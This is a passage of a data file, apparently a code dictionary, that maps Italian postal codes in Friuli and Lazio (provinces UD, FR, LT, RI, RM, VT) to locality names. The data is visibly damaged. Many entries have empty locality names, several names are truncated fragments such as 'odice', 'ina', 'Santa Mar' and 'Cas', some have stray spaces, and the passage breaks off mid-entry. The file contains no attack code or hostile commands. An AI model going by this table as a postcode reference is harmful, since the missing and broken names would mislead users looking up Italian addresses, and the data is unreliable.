["Vergnacco", "UD"], ["Qualso", "UD"], ["Osoppo", "UD"], ["Dogna", "UD"], ["Caporiacco", "UD"], ["Stolvizza", "UD"], ["Lusevera", "UD"], ["Avasinis", "UD"], ["Resiutta", "UD"], ["", "UD"], ["Vedronza", "UD"], ["Alesso", "UD"], ["Adegliacco", "UD"], ["Carnia", "UD"], ["Braulins", "UD"], ["Bordano", "UD"], ["Pagnacco", "UD"], ["", "UD"], ], "33011": [["Artegna", "UD"]], "33013": [["", "UD"], ["", "UD"], ["", "UD"]], "33015": [["", "UD"], ["", "UD"], ["", "UD"]], "33016": [["Pontebba", "UD"]], "33017": [["Collalto", "UD"], ["Tarcento", "UD"], ["Bulfons", "UD"]], "33018": [ ["Camporosso In Valcanale", "UD"], ["", "UD"], ["Fusine In Valromana", "UD"], ["Tarvisio", "UD"], ], "33019": [["Leonacco", "UD"], ["Tricesimo", "UD"]], "33020": [ ["", "UD"], ["", "UD"], ["", "UD"], ["Sutrio", "UD"], ["Ligosullo", "UD"], ["Ravascletto", "UD"], ["Sauris", "UD"], ["", "UD"], ["Pesariis", "UD"], ["Mediis", "UD"], ["", "UD"], ["Socchieve", "UD"], ["Verzegnis", "UD"], ["Cercivento", "UD"], ["Pieria", "UD"], ["Quinis", "UD"], ["Zuglio", "UD"], ["Rigolato", "UD"], ["Amaro", "UD"], ["Preone", "UD"], ["Enemonzo", "UD"], ], "33021": [["Ampezzo", "UD"]], "33022": [["", "UD"], ["", "UD"]], "33023": [["Comeglians", "UD"]], "33024": [["", "UD"]], "33025": [["Ovaro", "UD"]], "33026": [["Paluzza", "UD"], ["Cleulis", "UD"], ["Timau", "UD"]], "33027": [["Salino", "UD"], ["Paularo", "UD"], ["Dierico", "UD"]], "33028": [ ["Caneva", "UD"], ["", "UD"], ["", "UD"], ["Tolmezzo", "UD"], ["Cadunea", "UD"], ["Illegio", "UD"], ["Imponzo", "UD"], ], "33029": [ ["", "UD"], ["Invillino", "UD"], ["Lauco", "UD"], ["Chiassis", "UD"], ["Trava", "UD"], ["Raveo", "UD"], ], "33030": [ ["Dignano", "UD"], ["Carpacco", "UD"], ["Canussio", "UD"], ["", "UD"], ["Avilla", "UD"], ["Talmassons", "UD"], ["Coseano", "UD"], ["Varmo", "UD"], ["", "UD"], ["", "UD"], ["", "UD"], ["Flambro", "UD"], ["Brazzacco", "UD"], ["Basaldella", "UD"], ["Rodeano", "UD"], ["Vidulis", "UD"], ["Silvella", "UD"], ["", "UD"], ["", "UD"], ["Majano", "UD"], ["", "UD"], ["", "UD"], ["Campoformido", "UD"], ["Flaibano", "UD"], ["Roveredo", "UD"], ["", "UD"], ["Cornino", "UD"], ["Flumignano", "UD"], ["Ragogna", "UD"], ["Buja", "UD"], ["Muris", "UD"], ["", "UD"], ["Urbignacco", "UD"], ["", "UD"], ["Flagogna", "UD"], ["", "UD"], ["Bressa", "UD"], ["", "UD"], ["", "UD"], ["Cisterna", "UD"], ["Romans", "UD"], ["Moruzzo", "UD"], ], "33031": [ ["Villaorba", "UD"], ["Blessano", "UD"], ["Basagliapenta", "UD"], ["Variano", "UD"], ["Vissandone", "UD"], ["Orgnano", "UD"], ["Basiliano", "UD"], ], "33032": [["Bertiolo", "UD"], ["Pozzecco", "UD"]], "33033": [ ["Beano", "UD"], ["Rivolto", "UD"], ["Codroipo", "UD"], ["Biauzzo", "UD"], ["", "UD"], ["Lonca", "UD"], ], "33034": [["Fagagna", "UD"], ["Madrisio", "UD"], ["Ciconicco", "UD"]], "33035": [["", "UD"], ["", "UD"], ["Martignacco", "UD"]], "33036": [ ["", "UD"], ["Tomba", "UD"], ["Plasencis", "UD"], ["", "UD"], ["Pantianicco", "UD"], ], "33037": [["", "UD"], ["", "UD"], ["Passons", "UD"]], "33038": [["Villanova", "UD"], ["", "UD"], ["", "UD"]], "33039": [ ["Sedegliano", "UD"], ["Coderno", "UD"], ["Turrida", "UD"], ["", "UD"], ["", "UD"], ], "33040": [ ["", "UD"], ["Savogna", "UD"], ["Racchiuso", "UD"], ["", "UD"], ["Tapogliano", "UD"], ["Grions", "UD"], ["Povoletto", "UD"], ["", "UD"], ["Paciug", "UD"], ["Podresca", "UD"], ["Grimacco", "UD"], ["Attimis", "UD"], ["Campeglio", "UD"], ["Ipplis", "UD"], ["Faedis", "UD"], ["Stregna", "UD"], ["Ravosa", "UD"], ["Taipana", "UD"], ["Moimacco", "UD"], ["Drenchia", "UD"], ["Orsaria", "UD"], ["", "UD"], ["Cavenzano", "UD"], ["Visco", "UD"], ["Castelmonte", "UD"], ["Pradamano", "UD"], ["Magredis", "UD"], ["Prepotto", "UD"], ["Primulacco", "UD"], ["Torreano", "UD"], ["Premariacco", "UD"], ["Clodig", "UD"], ], "33041": [["", "UD"], ["Joannis", "UD"]], "33042": [["Buttrio", "UD"]], "33043": [["Purgessimo", "UD"], ["Sanguarzo", "UD"], ["", "UD"]], "33044": [["Manzano", "UD"]], "33045": [["Nimis", "UD"]], "33046": [["Pulfero", "UD"]], "33047": [["Orzano", "UD"], ["Cerneglons", "UD"], ["Ziracco", "UD"], ["Remanzacco", "UD"]], "33048": [ ["", "UD"], ["Chiopris", "UD"], ["Medeuzza", "UD"], ["Dolegnano", "UD"], ["", "UD"], ["", "UD"], ], "33049": [["", "UD"]], "33050": [ ["Porpetto", "UD"], ["Clauiano", "UD"], ["Mortegliano", "UD"], ["Chiasellis", "UD"], ["Sammardenchia", "UD"], ["", "UD"], ["Papariano", "UD"], ["Pocenia", "UD"], ["Ruda", "UD"], ["Castello", "UD"], ["Lestizza", "UD"], ["Sevegliano", "UD"], ["Terenzano", "UD"], ["Zugliano", "UD"], ["Carpeneto", "UD"], ["", "UD"], ["Felettis", "UD"], ["Ontagnano", "UD"], ["Torviscosa", "UD"], ["Malisana", "UD"], ["Carlino", "UD"], ["Fiumicello", "UD"], ["Gonars", "UD"], ["Precenicco", "UD"], ["", "UD"], ["Galleriano", "UD"], ["Lumignacco", "UD"], ["", "UD"], ["Lavariano", "UD"], ["Perteole", "UD"], ["Sclaunicco", "UD"], ["", "UD"], ["Cargnacco", "UD"], ["", "UD"], ["", "UD"], ["Percoto", "UD"], ["", "UD"], ["", "UD"], ["Risano", "UD"], ["", "UD"], ["", "UD"], ["Nespoledo", "UD"], ["", "UD"], ["Lauzacco", "UD"], ["Tissano", "UD"], ["Torsa", "UD"], ["", "UD"], ["Bicinicco", "UD"], ["Castions Delle Mura", "UD"], ["Ronchis", "UD"], ["", "UD"], ], "33051": [["", "UD"], ["Belvedere", "UD"], ["Aquileia", "UD"]], "33052": [["", "UD"], ["Strassoldo", "UD"]], "33053": [["Pertegada", "UD"], ["Latisana", "UD"], ["Gorgo", "UD"]], "33054": [["", "UD"], ["", "UD"]], "33055": [["", "UD"]], "33056": [["", "UD"]], "33057": [["Sottoselva", "UD"], ["Ialmicco", "UD"], ["Jalmicco", "UD"], ["Palmanova", "UD"]], "33058": [["", "UD"]], "33059": [["", "UD"]], "33061": [["Teor", "UD"], ["", "UD"], ["Rivarotta", "UD"], ["Rivignano", "UD"]], "33100": [ ["Cussignacco", "UD"], ["Laipacco", "UD"], ["Udine", "UD"], ["Baldasseria", "UD"], ["Godia", "UD"], ["Gervasutta", "UD"], ], "03010": [ ["Filettino", "FR"], ["Fumone", "FR"], ["", "FR"], ["Sgurgola", "FR"], ["", "FR"], ["Trivigliano", "FR"], ["Patrica", "FR"], ["Serrone", "FR"], ["Pitocco", "FR"], ["Collepardo", "FR"], ["", "FR"], ["Patoni", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["Piglio", "FR"], ["", "FR"], ["Acuto", "FR"], ], "03011": [["", "FR"], ["Tecchiena", "FR"], ["Collelavena", "FR"], ["Alatri", "FR"]], "03012": [["", "FR"], ["Anagni", "FR"]], "03013": [["Tofe", "FR"], ["Porciano", "FR"], ["Ferentino", "FR"], ["", "FR"]], "03014": [["Fiuggi", "FR"], ["", "FR"]], "03016": [["Guarcino", "FR"], ["Campocatino", "FR"]], "03017": [["Morolo", "FR"], ["", "FR"]], "03018": [["Paliano", "FR"]], "03019": [["Supino", "FR"]], "03020": [ ["Arnara", "FR"], ["Pastena", "FR"], ["", "FR"], ["Pico", "FR"], ["Strangolagalli", "FR"], ["Torrice", "FR"], ["Vallecorsa", "FR"], ["", "FR"], ["Falvaterra", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ], "03021": [["Amaseno", "FR"]], "03022": [ ["Scrima", "FR"], ["Rotabile", "FR"], ["", "FR"], ["Casavitola", "FR"], ["", "FR"], ["", "FR"], ["Brecciaro", "FR"], ["", "FR"], ], "03023": [["Ceccano", "FR"]], "03024": [["Ceprano", "FR"]], "03025": [ ["Anitrella", "FR"], ["Colli", "FR"], ["", "FR"], ["Porrino", "FR"], ["Chiaiamari", "FR"], ], "03026": [["Pofi", "FR"]], "03027": [["Ripi", "FR"]], "03028": [["", "FR"]], "03029": [ ["Scifelli", "FR"], ["Colleberardi", "FR"], ["Giglio", "FR"], ["Castelmassimo", "FR"], ["Veroli", "FR"], ["Cotropagno", "FR"], ["", "FR"], ["", "FR"], ["Panetta", "FR"], ["", "FR"], ["Casamari", "FR"], ], "03030": [ ["Santopadre", "FR"], ["", "FR"], ["Broccostella", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["Casalattico", "FR"], ["", "FR"], ["Castrocielo", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["Vicalvi", "FR"], ["", "FR"], ["Fontechiari", "FR"], ["Castelliri", "FR"], ["Colfelice", "FR"], ["Coldragone", "FR"], ["Pescosolido", "FR"], ["Piumarola", "FR"], ], "03031": [["Aquino", "FR"]], "03032": [["Isoletta", "FR"], ["Arce", "FR"]], "03033": [["Scaffa", "FR"], ["Arpino", "FR"], ["", "FR"]], "03034": [["Casalvieri", "FR"], ["Purgatorio", "FR"], ["Roselli", "FR"]], "03035": [ ["", "FR"], ["", "FR"], ["Collefontana", "FR"], ["San Paolo", "FR"], ], "03036": [["", "FR"]], "03037": [ ["Pontecorvo", "FR"], ["", "FR"], ["Sant'Oliva", "FR"], ["", "FR"], ], "03038": [["Roccasecca", "FR"], ["", "FR"], ["Caprile", "FR"]], "03039": [["Sora", "FR"], ["Carnello", "FR"], ["", "FR"]], "03040": [ ["Selvacava", "FR"], ["", "FR"], ["", "FR"], ["Valvori", "FR"], ["", "FR"], ["Gallinaro", "FR"], ["Acquafondata", "FR"], ["Villa Latina", "FR"], ["Picinisco", "FR"], ["San Biagio Saracinisco", "FR"], ["", "FR"], ["Casalcassinese", "FR"], ["", "FR"], ["Pietrafitta", "FR"], ["", "FR"], ["Viticuso", "FR"], ["", "FR"], ["Terelle", "FR"], ["", "FR"], ["Ausonia", "FR"], ["Vallemaio", "FR"], ["", "FR"], ["Settefrati", "FR"], ["Vallerotonda", "FR"], ], "03041": [["", "FR"], ["Sant'Onofrio", "FR"], ["Alvito", "FR"]], "03042": [["Atina", "FR"], ["", "FR"], ["Atina Inferiore", "FR"]], "03043": [ ["odice", "FR"], ["", "FR"], ["Montecassino", "FR"], ["Caira", "FR"], ["Cassino", "FR"], ["", "FR"], ], "03044": [ ["Pacitti", "FR"], ["Sprumaro", "FR"], ["Pastenelle", "FR"], ["Cervaro", "FR"], ["", "FR"], ], "03045": [["Monticelli", "FR"], ["Esperia", "FR"], ["Esperia Inferiore", "FR"]], "03046": [["", "FR"]], "03047": [["", "FR"]], "03048": [["Sant'Apollinare", "FR"]], "03049": [["Olivella", "FR"], ["Valleluce", "FR"], ["", "FR"], ["Portella", "FR"]], "03100": [ ["Frosinone", "FR"], ["", "FR"], ["", "FR"], ["Frosinone Stazione", "FR"], ], "04010": [ ["", "LT"], ["", "LT"], ["Prossedi", "LT"], ["", "LT"], ["Giulianello", "LT"], ["Roccagorga", "LT"], ["", "LT"], ["Pisterzo", "LT"], ["", "LT"], ["Cori", "LT"], ["Bassiano", "LT"], ["Maenza", "LT"], ["Sonnino", "LT"], ["Norma", "LT"], ], "04011": [ ["Fossignano", "LT"], ["Camilleri", "LT"], ["Campoleone", "LT"], ["", "LT"], ["Carano", "LT"], ["Campoverde", "LT"], ["Aprilia", "LT"], ["Casalazara", "LT"], ["Vallelata", "LT"], ["Pantanelle", "LT"], ["", "LT"], ["Cogna", "LT"], ], "04012": [["Le Castella", "LT"], ["", "LT"], ["Cisterna Di Latina", "LT"]], "04013": [ ["Sermoneta", "LT"], ["Monticchio", "LT"], ["Carrara", "LT"], ["", "LT"], ["Doganella", "LT"], ["Lateroporto", "LT"], ["", "LT"], ], "04014": [["Pontinia", "LT"], ["", "LT"]], "04015": [["", "LT"], ["Fossanova", "LT"], ["Priverno", "LT"]], "04016": [["", "LT"], ["Sabaudia", "LT"], ["", "LT"], ["", "LT"]], "04017": [["", "LT"], ["", "LT"]], "04018": [["", "LT"], ["Sezze", "LT"]], "04019": [["Badino", "LT"], ["", "LT"], ["Terracina", "LT"], ["La Fiora", "LT"]], "04020": [ ["Ventotene", "LT"], ["", "LT"], ["Itri", "LT"], ["", "LT"], ["Campodimele", "LT"], ["Grunuovo", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["Spore", "LT"], ["", "LT"], ], "04021": [["", "LT"], ["San Cataldo", "LT"], ["Castelforte", "LT"], ["", "LT"]], "04022": [["", "LT"], ["San Magno", "LT"], ["Fondi", "LT"]], "04023": [ ["", "LT"], ["Penitro", "LT"], ["Castellonorato", "LT"], ["", "LT"], ["", "LT"], ["Maranola", "LT"], ["Formia", "LT"], ], "04024": [["Gaeta", "LT"]], "04025": [["", "LT"], ["Lenola", "LT"]], "04026": [ ["Scauri", "LT"], ["", "LT"], ["Tremensuoli", "LT"], ["Minturno", "LT"], ["Santa Mar", "LT"], ["", "LT"], ], "04027": [["Ponza", "LT"], ["Le Forna", "LT"]], "04029": [["Sperlonga", "LT"]], "04100": [ ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["Latina", "LT"], ["", "LT"], ["", "LT"], ["Fogliano", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ], "02010": [ ["Rivodutri", "RI"], ["", "RI"], ["Micigliano", "RI"], ["Borbona", "RI"], ["", "RI"], ["Labro", "RI"], ["Vallemare", "RI"], ["", "RI"], ["Santa Croce Di Cittareale", "RI"], ["", "RI"], ["Piedicolle", "RI"], ["", "RI"], ["Santa Croce", "RI"], ["Cittareale", "RI"], ], "02011": [["Accumoli", "RI"], ["Grisciano", "RI"]], "02012": [ ["Torrita", "RI"], ["", "RI"], ["Preta", "RI"], ["Collemoresco", "RI"], ["Amatrice", "RI"], ["Scai", "RI"], ["Sommati", "RI"], ["Santa Giusta", "RI"], ], "02013": [["Antrodoco", "RI"]], "02014": [["Fantauzzi", "RI"], ["Cantalice", "RI"], ["", "RI"]], "02015": [["Cittaducale", "RI"], ["Grotti", "RI"], ["", "RI"], ["", "RI"]], "02016": [ ["", "RI"], ["Leonessa", "RI"], ["", "RI"], ["Piedelpoggio", "RI"], ["Albaneto", "RI"], ["Vindoli", "RI"], ["Terzone", "RI"], ], "02018": [["", "RI"]], "02019": [["Picciame", "RI"], ["", "RI"], ["Posta", "RI"], ["Favischio", "RI"]], "02020": [ ["", "RI"], ["", "RI"], ["Turania", "RI"], ["", "RI"], ["Stipes", "RI"], ["Collegiove", "RI"], ["", "RI"], ["Concerviano", "RI"], ["Nespolo", "RI"], ["Ascrea", "RI"], ["Marcetelli", "RI"], ["Campolano", "RI"], ["", "RI"], ["Roccaranieri", "RI"], ["", "RI"], ["Vaccareccia", "RI"], ], "02021": [ ["Corvaro", "RI"], ["", "RI"], ["Collemaggiore", "RI"], ["Sant'Anatolia", "RI"], ["Villerose", "RI"], ["", "RI"], ["Torano", "RI"], ["Poggiovalle", "RI"], ["Borgorose", "RI"], ], "02022": [["", "RI"]], "02023": [ ["Fiamignano", "RI"], ["", "RI"], ["Sant'Ippolito", "RI"], ["Sant'Agapito", "RI"], ["Santa Lucia", "RI"], ["Peschieta", "RI"], ], "02024": [ ["Pescorocchiano", "RI"], ["Leofreni", "RI"], ["Pace", "RI"], ["", "RI"], ["Sant'Elpidio", "RI"], ], "02025": [ ["Fiumata", "RI"], ["Castelmareri", "RI"], ["Capradosso", "RI"], ["", "RI"], ["", "RI"], ], "02026": [["", "RI"], ["Posticciola", "RI"]], "02030": [ ["", "RI"], ["", "RI"], ["Casaprota", "RI"], ["Collelungo", "RI"], ["ina", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ], "02031": [["", "RI"]], "02032": [ ["", "RI"], ["", "RI"], ["", "RI"], ["Talocci", "RI"], ["Coltodino", "RI"], ["Farfa", "RI"], ["", "RI"], ["Canneto", "RI"], ["", "RI"], [" Sabina", "RI"], ["", "RI"], ["", "RI"], ], "02033": [["", "RI"], ["", "RI"]], "02034": [["Bocchignano", "RI"], ["", "RI"]], "02035": [["Orvinio", "RI"]], "02037": [["Fiacchini", "RI"], ["", "RI"], ["Cerdomare", "RI"], ["", "RI"]], "02038": [["Scandriglia", "RI"], ["Ponticelli", "RI"]], "02039": [["Toffia", "RI"]], "02040": [ ["Roccantica", "RI"], ["Vacone", "RI"], ["Cottanello", "RI"], ["", "RI"], ["", "RI"], ["Mompeo", "RI"], ["Configni", "RI"], ["Fianello", "RI"], ["Cantalupo In Sabina", "RI"], ["", "RI"], [" In Sabina", "RI"], ["", "RI"], ["Montebuono", "RI"], ["Salisano", "RI"], ["Tarano", "RI"], ["Selci", "RI"], ["Montasola", "RI"], ], "02041": [["Casperia", "RI"]], "02042": [["Collevecchio", "RI"]], "02043": [ ["Montisola", "RI"], ["Contigliano", "RI"], ["", "RI"], ["San Filippo", "RI"], ], "02044": [["Forano", "RI"], ["", "RI"]], "02045": [["Greccio", "RI"], ["Limiti Di Greccio", "RI"]], "02046": [["Foglia", "RI"], ["", "RI"]], "02047": [ ["", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ], "02048": [["", "RI"], ["Stimigliano", "RI"], ["", "RI"]], "02049": [[" Sabina", "RI"]], "02100": [ ["", "RI"], ["Rieti", "RI"], ["Casette", "RI"], ["", "RI"], ["", "RI"], ["Vazia", "RI"], ["", "RI"], ["", "RI"], ], "00010": [ ["Poli", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["San ", "RM"], ["Casape", "RM"], ["", "RM"], ["San Gregorio ", "RM"], ["", "RM"], ["Setteville", "RM"], ["Marcellina", "RM"], ["Monteflavio", "RM"], ["Moricone", "RM"], ["Montelibretti", "RM"], ], "00011": [["", "RM"]], "00012": [ ["Villalba", "RM"], ["", "RM"], ["", "RM"], ["Villanova", "RM"], ["Albuccione", "RM"], ["Montecelio", "RM"], ["", "RM"], ["", "RM"], ["Guidonia", "RM"], ], "00013": [ ["Castelchiodato", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Mentana", "RM"], ], "00015": [["Monterotondo", "RM"], ["", "RM"]], "00017": [["Nerola", "RM"], ["Acquaviva", "RM"]], "00018": [["", "RM"], ["Cretone", "RM"]], "00019": [ ["", "RM"], ["Pontelucano", "RM"], ["Tivoli", "RM"], ["Arci", "RM"], ["Empolitana", "RM"], ["", "RM"], ["", "RM"], ], "00020": [ ["Jenne", "RM"], ["Agosta", "RM"], ["Pisoniano", "RM"], ["Canterano", "RM"], ["", "RM"], ["", "RM"], ["Ciciliano", "RM"], ["", "RM"], ["Percile", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Riofreddo", "RM"], ["", "RM"], ["", "RM"], ["Mandela", "RM"], ["Vallepietra", "RM"], ["Vallinfreda", "RM"], ["", "RM"], ["Sambuci", "RM"], ["Roccagiovine", "RM"], ["Saracinesco", "RM"], ], "00021": [["Affile", "RM"]], "00022": [["", "RM"]], "00023": [["Arsoli", "RM"]], "00024": [["", "RM"]], "00025": [["Gerano", "RM"]], "00026": [["Civitella", "RM"], ["Licenza", "RM"]], "00027": [["Roviano", "RM"]], "00028": [["Subiaco", "RM"]], "00029": [["Vicovaro", "RM"]], "00030": [ ["", "RM"], ["Colonna", "RM"], ["", "RM"], ["Gorga", "RM"], ["Labico", "RM"], ["Montelanico", "RM"], ["", "RM"], ["Guadagnolo", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Genazzano", "RM"], ["Bellegra", "RM"], ["Gavignano", "RM"], ["Roiate", "RM"], ["", "RM"], ], "00031": [["Artena", "RM"], ["Macere", "RM"], ["Colubro", "RM"]], "00032": [["", "RM"]], "00033": [["", "RM"], ["Cave", "RM"]], "00034": [["", "RM"], ["", "RM"], ["Colleferro", "RM"]], "00035": [["", "RM"]], "00036": [["Palestrina", "RM"], ["Carchitti", "RM"]], "00037": [["Segni", "RM"]], "00038": [["Valmontone", "RM"]], "00039": [["", "RM"], ["Zagarolo", "RM"]], "00040": [ ["", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Ardea", "RM"], ["", "RM"], ["Frattocchie", "RM"], ], "00041": [ ["C", "RM"], ["Cecchina", "RM"], ["Pavona Stazione", "RM"], ["", "RM"], ["Pavona", "RM"], ], "00042": [["", "RM"], ["Anzio", "RM"], ["", "RM"], ["", "RM"]], "00043": [["Casabianca", "RM"], ["", "RM"], ["Ciampino", "RM"]], "00044": [["Frascati", "RM"], ["Vermicino", "RM"]], "00045": [["Landi", "RM"], ["Pedica", "RM"], ["", "RM"]], "00046": [["", "RM"], ["Grottaferrata", "RM"]], "00047": [["Marino", "RM"]], "00048": [["Nettuno", "RM"]], "00049": [["Velletri", "RM"]], "00050": [["Testa Di Lepre Di Sopra", "RM"]], "00051": [["La Bianca", "RM"], ["Allumiere", "RM"]], "00052": [ ["Ceri", "RM"], ["", "RM"], ["Cerveteri", "RM"], ["Cerenova", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ], "00053": [["Civitavecchia", "RM"], ["Aurelia", "RM"], ["", "RM"]], "00054": [ ["Maccarese", "RM"], ["Fregene", "RM"], ["Testa Di Lepre", "RM"], ["", "RM"], ["Fiumicino", "RM"], ["Torrimpietra", "RM"], ["Focene", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ], "00055": [["", "RM"], ["Ladispoli", "RM"], ["Palo", "RM"]], "00057": [["Malagrotta", "RM"], ["", "RM"]], "00058": [["Santa Marinella", "RM"], ["Santa Severa", "RM"]], "00059": [["Tolfa", "RM"], ["", "RM"]], "00060": [ ["", "RM"], ["Nazzano", "RM"], ["Filacciano", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Belvedere", "RM"], ["", "RM"], ["Bellavista", "RM"], ["", "RM"], ["", "RM"], ["Formello", "RM"], ["", "RM"], ["Capena", "RM"], ["", "RM"], ["", "RM"], ["Riano", "RM"], ["Sant'Oreste", "RM"], ["", "RM"], ["", "RM"], ["Terrazze", "RM"], ["Montevirginio", "RM"], ["Girardi", "RM"], ["", "RM"], ["Sacrofano", "RM"], ], "00061": [["", "RM"]], "00062": [["Bracciano", "RM"], ["Rinascente", "RM"], ["", "RM"], ["", "RM"]], "00063": [["", "RM"]], "00065": [["Feronia", "RM"], ["", "RM"]], "00066": [["Manziana", "RM"], ["Quadroni", "RM"]], "00067": [["Morlupo", "RM"]], "00068": [["", "RM"]], "00069": [["Vicarello", "RM"], ["", "RM"]], "00071": [["", "RM"], ["", "RM"], ["Pomezia", "RM"], ["Torvaianica", "RM"]], "00072": [["Ariccia", "RM"], ["Galloro", "RM"]], "00073": [["", "RM"], ["", "RM"]], "00074": [["Nemi", "RM"]], "00075": [["Pascolare", "RM"], ["Lanuvio", "RM"]], "00076": [["Lariano", "RM"]], "00077": [["", "RM"], ["Molara", "RM"], ["Montecompatri", "RM"]], "00078": [["", "RM"], ["Armetta", "RM"]], "00079": [["", "RM"], ["", "RM"]], "00118": [["Roma", "RM"]], "00119": [["Roma", "RM"], ["Ostica", "RM"]], "00120": [["Roma", "RM"]], "00121": [["Roma", "RM"], ["Lido Di Ostia Ponente", "RM"]], "00122": [["Roma", "RM"], ["", "RM"], ["", "RM"], ["", "RM"]], "00123": [["La Storta", "RM"], ["Roma", "RM"], ["", "RM"]], "00124": [["Cas", "RM"], ["Roma", "RM"]], "00125": [["Acilia", "RM"], ["Roma", "RM"]], "00126": [["Roma", "RM"]], "00127": [["Risaro", "RM"], ["Roma", "RM"], ["Mezzocammino", "RM"], ["Vitinia", "RM"]], "00128": [ ["Roma", "RM"], ["", "RM"], ["", "RM"], ["Malpasso", "RM"], ["", "RM"], ], "00131": [["Roma", "RM"], ["Settecamini", "RM"]], "00132": [ ["Roma", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ], "00133": [["", "RM"], ["", "RM"], ["Roma", "RM"], ["Torrenova", "RM"]], "00134": [["", "RM"], ["", "RM"], ["Roma", "RM"]], "00135": [["Roma", "RM"], ["", "RM"], ["", "RM"]], "00136": [["Roma", "RM"]], "00137": [["Roma", "RM"]], "00138": [ ["", "RM"], ["Roma", "RM"], ["Marcigliana", "RM"], ["", "RM"], ["Settebagni", "RM"], ], "00139": [["Roma", "RM"]], "00141": [["Roma", "RM"]], "00142": [["Roma", "RM"]], "00143": [["Roma", "RM"], ["Cecchignola", "RM"]], "00144": [["Roma", "RM"], ["Decima", "RM"]], "00145": [["Roma", "RM"]], "00146": [["Roma", "RM"]], "00147": [["Roma", "RM"]], "00148": [["", "RM"], ["Roma", "RM"], ["Magliana Trullo", "RM"]], "00149": [["Roma", "RM"]], "00151": [["Roma", "RM"]], "00152": [["Roma", "RM"]], "00153": [["Roma", "RM"]], "00154": [["Roma", "RM"]], "00155": [["La Rustica", "RM"], ["Tor Sapienza", "RM"], ["Roma", "RM"]], "00156": [["Roma", "RM"], ["Rebibbia", "RM"]], "00157": [["Roma", "RM"]], "00158": [["Roma", "RM"]], "00159": [["Roma", "RM"]], "00161": [["Roma", "RM"]], "00162": [["Roma", "RM"]], "00163": [["Roma", "RM"]], "00164": [["Roma", "RM"]], "00165": [["Roma", "RM"]], "00166": [["Roma", "RM"], ["", "RM"]], "00167": [["Roma", "RM"]], "00168": [["Roma", "RM"]], "00169": [["Roma", "RM"], ["Torre Maura", "RM"], ["Torre Spaccata", "RM"]], "00171": [["Roma", "RM"]], "00172": [["Roma", "RM"]], "00173": [["Roma", "RM"]], "00174": [["Roma", "RM"]], "00175": [["Roma", "RM"]], "00176": [["Roma", "RM"]], "00177": [["Roma", "RM"]], "00178": [["Roma", "RM"], ["Torricola", "RM"], ["Capannelle", "RM"]], "00179": [["Roma", "RM"]], "00181": [["Roma", "RM"]], "00182": [["Roma", "RM"]], "00183": [["Roma", "RM"]], "00184": [["Roma", "RM"]], "00185": [["Roma", "RM"]], "00186": [["Roma", "RM"]], "00187": [["Roma", "RM"]], "00188": [["Labaro", "RM"], ["Prima Porta", "RM"], ["Roma", "RM"]], "00189": [["Roma", "RM"], ["", "RM"], ["Grottarossa", "RM"]], "00191": [["Roma", "RM"]], "00192": [["Roma", "RM"]], "00193": [["Roma", "RM"]], "00194": [["Roma", "RM"]], "00195": [["Roma", "RM"]], "00196": [["Roma", "RM"]], "00197": [["Roma", "RM"]], "00198": [["Roma", "RM"]], "00199": [["Roma", "RM"]], "01010": [ ["", "VT"], ["Blera", "VT"], ["", "VT"], ["Vejano", "VT"], ["", "VT"], ["Gradoli", "VT"], ["Piansano", "VT"], ["Tessennano", "VT"], ["Capodimonte", "VT"], ["", "VT"], ["Cellere", "VT"], ["Onano", "VT"], ["Marta", "VT"], ["Farnese", "VT"], ["", "VT"], ["Latera", "VT"], ["", "VT"], ["", "VT"], ], "01011": [["Musignano", "VT"], ["Canino", "VT"]], "01012": [["", "VT"], ["Capranica", "VT"]], "01014": [["", "VT"], ["", "VT"]], "01015": [["Sutri", "VT"]], "01016": [["Tarquinia", "VT"], ["", "VT"], ["", "VT"]], "01017": [["Tuscania", "VT"]], "01018": [["Valentano", "VT"]], "01019": [ ["", "VT"], ["Pietrara", "VT"], ["Giardino", "VT"], ["", "VT"], ["Cura", "VT"], ["Vetralla", "VT"], ], "01020": [ ["Bomarzo", "VT"], ["Lubriano", "VT"], ["Celleno", "VT"], ["Casenuove", "VT"], ["", "VT"], ["Sipicciano", "VT"], ["Proceno", "VT"], ["Mugnano", "VT"], ["", "VT"], ["", "VT"], ["Graffignano", "VT"], ], "01021": [["Acquapendente", "VT"], ["", "VT"], ["Trevinano", "VT"]], "01022": [["Civita", "VT"], ["Bagnoregio", "VT"], ["Vetriolo", "VT"], ["", "VT"]], "01023": [["Bolsena", "VT"]], "01024": [["Castiglione In Teverina", "VT"], ["Sermugnano", "VT"]], "01025": [["", "VT"]], "01027": [["Le Mosse", "VT"], ["Montefiascone", "VT"], ["Zepponami", "VT"]], "01028": [["Orte Scalo", "VT"], ["Orte", "VT"], ["Orte Stazione", "VT"]], "01030": [ ["", "VT"], ["Vitorchiano Stazione", "VT"], ["Vitorchiano", "VT"], ["Vallerano", "VT"], ["Corchiano", "VT"], ["Vasanello", "VT"], ["Bassano In Teverina", "VT"], ["", "VT"], ["Carbognano", "VT"], ["Canepina", "VT"], ["Monterosi", "VT"], ["Calcata", "VT"], ["Faleria", "VT"], ["Calcata Nuova", "VT"], ], "01032": [["Caprarola", "VT"]], "01033": [ ["Borghetto", "VT"], ["Civita Castellana Stazione", "VT"], ["Borghetto Di Civita Castellana Stazione", "VT"], ["Civita Castellana", "VT"], ], "01034": [["Regolelli", "VT"], ["Fabrica Di Roma", "VT"]], "01035": [["Scalo Teverina", "VT"], ["Gallese", "VT"]], "01036": [["Nepi", "VT"]], "01037": [["", "VT"], 